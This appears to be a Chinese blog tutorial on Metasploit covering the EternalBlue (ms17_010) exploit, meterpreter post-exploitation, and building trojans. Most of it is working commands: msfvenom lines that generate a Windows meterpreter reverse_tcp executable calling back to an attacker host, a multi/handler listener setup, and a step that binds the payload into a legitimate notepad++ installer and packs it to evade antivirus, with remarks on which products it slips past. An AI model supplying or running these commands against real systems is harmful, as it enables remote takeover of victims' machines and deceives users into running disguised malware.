msf

MSF——基本使用和Exploit模块(一) – 走看看 (zoukankan.com)

1、介绍

matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了 各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

msfconsole

2、永恒之蓝

永恒之蓝 2017年4月4日 黑客团体Brokeers影子经纪人 网络攻击工具
利用windows系统的smb漏洞可以获取系统最高权限
5月12日 出现基于此的wanacry勒索病毒

3、使用模块

有上千个模块,搜索语法

search ms17_010
//exploit 攻击脚本
//auxiliary 辅助脚本,测试漏洞是否存在

use 编号
use 全称

//查看设置
show options或者options
# 设置参数
set RHOSTS 192.168.2.129
# payload option攻击载荷,指的是目标的操作系统,主要是32和64,最新版msf是默认64
# LHOST 监听地址,即运行msf的主机
# LPORT msf使用端口
# set lport 60000

# 攻击
run
# meterpreter标识,标识攻击成功

MSDN, 我告诉你 – 做一个安静的工具站 (itellyou.cn),一个windows的镜像资源站点,其中的操作系统是原生纯净的,没有任何补丁。

4、后门

meterpreter是强大的后渗透模块

help //在meterpreter标识输入,获取帮助信息

远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统

msfvenom是用来生成后门的软件,在目标上执行后门,在本地监听上线。

msfvenom在shell里使用,不是msfconsole终端

病毒分为破坏性的和共存性的

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe
  • -p payload
  • 系统/架构/作用/方式
  • 本地ip和本地端口,是自主设置的
  • -f format
  • 作用之后生成文件

一般会被防火墙过滤,需要免杀

5、

use exploit/multi/handler
//三个必须的设置,需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run

用户双击exe运行之后,攻击者就会收到。

6、权限维持和二次

7、免杀

捆绑木马:下载正常程序,然后捆绑,当用户收到软件执行后会触发。

(可以绕过火绒,但无法绕过对文件校验的360.且需要注意国内程序默认一般是32,无法植入64位的木马)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe

加壳:本身是保护软件不被反编译,不被抄袭。分为压缩壳、加密壳

通过加壳软件使用,比如themida

posted @ 2023-04-16 16:38  挖洞404  阅读(39)  评论(0编辑  收藏  举报